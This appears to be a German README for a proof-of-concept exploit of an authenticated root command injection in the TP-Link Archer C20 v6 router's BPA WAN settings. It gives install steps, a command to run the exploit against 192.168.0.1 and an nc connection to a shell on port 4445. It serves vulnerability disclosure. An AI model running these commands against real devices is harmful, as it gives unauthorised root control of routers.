
Proof-of-Concept-Exploit für eine authentifizierte OS-Befehlsinjektion in der Weboberfläche des TP-Link Archer C20 v6, die Root-Befehle über die BPA-WAN-Konfiguration im LAN ausführt.
Authentifizierte OS-Befehlsinjektion in der Webverwaltungsoberfläche des TP-Link Archer C20 v6.
BPA-WAN-Konfigurationswerte werden ohne ausreichende Neutralisierung an system() übergeben, wodurch ein authentifizierter Administrator im angrenzenden Netzwerk Befehle als root ausführen kann.
Entdeckt und gemeldet von Daniil Gordeev (totekuh).
0.9.1 Build 2608110.9.1 Build 2608120.9.1 Build 260812requests und pycryptodomepython3 -m pip install requests pycryptodome
python3 bpa-poc.py --target 192.168.0.1 --password '<admin-password>'
nc 192.168.0.1 4445
Verwenden Sie --list-only, um WAN-Instanzen aufzulisten, ohne die
Befehlsinjektion auszulösen.